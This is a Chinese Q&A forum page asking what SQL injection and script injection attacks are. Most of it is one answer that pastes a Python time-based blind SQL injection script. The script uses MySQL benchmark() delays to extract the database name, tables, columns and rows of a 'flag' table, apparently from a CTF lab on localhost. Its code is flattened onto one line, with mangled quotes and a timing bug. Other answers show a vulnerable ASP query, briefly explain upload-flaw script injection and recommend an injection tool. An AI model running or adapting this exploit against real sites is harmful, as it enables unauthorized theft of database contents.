什么是sql注入攻击和脚本注入攻击?

发布网友发布时间：2022-05-02 15:59

共3个回答

懂视网时间：2022-05-02 20:20

requests urlx = ‘http://127.0.0.1/?id= 1 and if((substr((select database()),‘ payloads = ‘qwertyuiopasdfghjklzxcvbnm{}_0123456789‘ def guess_column(table): string = ‘‘ extend = 0 list = [] length2 = 0 num = [] num1 = [] url1 = ‘http://127.0.0.1/?id= 1 and if(((select count(column_name) from information_schema.columns where table_name=‘‘+ table + ‘‘)=‘ url2 = ‘http://127.0.0.1/?id= 1 and if((substr((select column_name from information_schema.columns where table_name=‘‘ + table + ‘‘ limit ‘ url3 = ‘http://127.0.0.1/?id= 1 and if(((select length(column_name) from information_schema.columns where table_name=‘‘ + table + ‘‘ limit ‘ url4 = ‘http://127.0.0.1/?id= 1 and if(((substr((select ‘ url5 = ‘http://127.0.0.1/?id= 1 and if(((select count(‘ url7 = ‘http://127.0.0.1/?id= 1 and if(((select length(‘ for i in range(50): #获取字段数量 url = url1 + str(i) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) print(url) time = r.elapsed.total_seconds() print(time) if time > 1.5: extend = i length2 = i break for k in range(extend): st = ‘‘ extend1 = 0 for m in range(100): url = url3 + str(k) + ‘,1)=‘ + str(m) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ #获取字段长度 r = requests.get(url) if time > 1.5: extend1 = m break for i in range(1,extend1+1): #获取字段 for payload in payloads: url = url2 + str(k) + ‘,1),‘ + str(i) + ‘,1)=‘‘ + payload + ‘‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) st += payload break list.append(st) num1.append(st) length = 0 for i in range(1,10000): #获取记录数量 url = url5 + str(num1[0]) + ‘) from ‘ + table + ‘)=‘ + str(i) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ print(url) r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: length = i break for column in list: str1 = ‘‘ for i in range(length): length1 = 0 url6 = url4 + str(column) + ‘ from ‘ + table + ‘ limit ‘ + str(i) for k in range(100): #获取记录长度 url = url7 + str(column) + ‘) from ‘+ table + ‘ limit ‘ + str(i) + ‘,1)=‘ + str(k) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) length1 = k break for n in range(1,length1+1): #获取记录 for payload in payloads: url = url6 + ‘,1),‘ + str(n) + ‘,1))=‘‘ + str(payload) + ‘‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: print(url) str1 += payload break num.append(str1) str1 = ‘‘ for column in num1: print(column+‘ ‘,end=‘‘) print(‘ ‘,end=‘‘) for i in range(length2): for k in range(length): x = i + length * k print(num[x]+‘ ‘,end=‘‘) print(‘ ‘,end=‘‘) def guess_table(): string = ‘‘ extend = 0 list = [] url1 = ‘http://127.0.0.1/?id= 1 and if(((select count(table_name) from information_schema.tables where table_schema=database())=‘ url2 = ‘http://127.0.0.1/?id= 1 and if((substr((select table_name from information_schema.tables where table_schema=database() limit ‘ url3 = ‘http://127.0.0.1/?id= 1 and if(((select length(table_name) from information_schema.tables where table_schema=database() limit ‘ for i in range(50): url = url1 + str(i) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend = i break for k in range(extend): st = ‘‘ extend1 = 0 for m in range(100): url = url3 + str(k) + ‘,1)=‘ + str(m) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend1 = m break for i in range(1,extend1+1): for payload in payloads: url = url2 + str(k) + ‘,1),‘ + str(i) + ‘,1)=‘‘ + payload + ‘‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: st += payload break list.append(st) print(‘------------‘) for i in list: print(f‘[*]{i}‘) print(‘------------‘) guess_column(‘flag‘) def main(): string = ‘‘ url1 = ‘http://127.0.0.1/?id= 1 and if((length(database())=‘ extend = 0 for k in range(20): url = url1 + str(k) + ‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: extend = k break for i in range(1,extend+1): for payload in payloads: url = urlx + str(i) + ‘,1)=‘‘ url = url + payload + ‘‘),benchmark(1000000,md5(‘test‘)),NULL); %23‘ r = requests.get(url) time = r.elapsed.total_seconds() if time > 1.5: string += payload break print(f‘available database [*] {string}‘) guess_table() main()

sql注入------基于时间延迟benchmark函数注入脚本

标签：def get [] cond lag url bsp main chm

热心网友时间：2022-05-02 17:28

sql注入，，就是利用网站的一些SQL漏洞，，进行注入，，打个比方ASP写的下面一句
select * from user where userid=" & request.queryString("userid")

向上面的语句就可以实现SQL注入了。。

具体怎么注入我就不讲了，内容太多了。。你下载个阿D注入工具用一下就明白了。

脚本注入利用的是上传漏洞。。。也是上传的时候检查不够严格，打比方没有检测扩展名，，

热心网友时间：2022-05-02 18:46

sql注入攻击
http://ke.baidu.com/view/983303.htm

脚本注入攻击
http://www.anqn.com/zhuru/article/2008-07-13/a0999198.shtml

什么是sql注入攻击 和 脚本注入攻击?

什么是sql注入攻击和脚本注入攻击?